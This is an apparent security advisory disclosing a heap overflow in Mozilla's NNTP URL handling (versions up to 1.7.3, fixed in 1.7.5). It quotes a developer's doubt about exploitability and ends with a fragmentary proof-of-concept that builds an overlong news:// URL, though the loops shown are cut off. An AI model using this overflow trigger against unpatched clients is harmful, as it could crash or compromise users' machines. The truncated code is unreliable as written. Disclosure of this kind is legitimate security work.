A critical security vulnerability has been found in Mozilla Project code handling NNTP protocol.
Mozilla browser supports NNTP urls. Remote side is able to trigger news://
connection to any server. I found a flaw in NNTP handling code which may cause heap overflow and allow remote attacker to execute arbitrary code on client machine.
Mozilla Browser <= 1.7.3 with mozilla-mail
This bug is fixed in Mozilla 1.7.5. (Bug 264388) Mozilla developer Dan Veditz claims that it cannot be exploitable: "A '\' on the end will certainly trash memory, but at that point you're no
longer reading attacker-supplied data;".
On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code overflows the buffer using attacker-supplied data. I decided to make this bug public because Mozilla Team hasn't warned users.
Proof of Concept
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
for(l = 0; l < 16384; l++)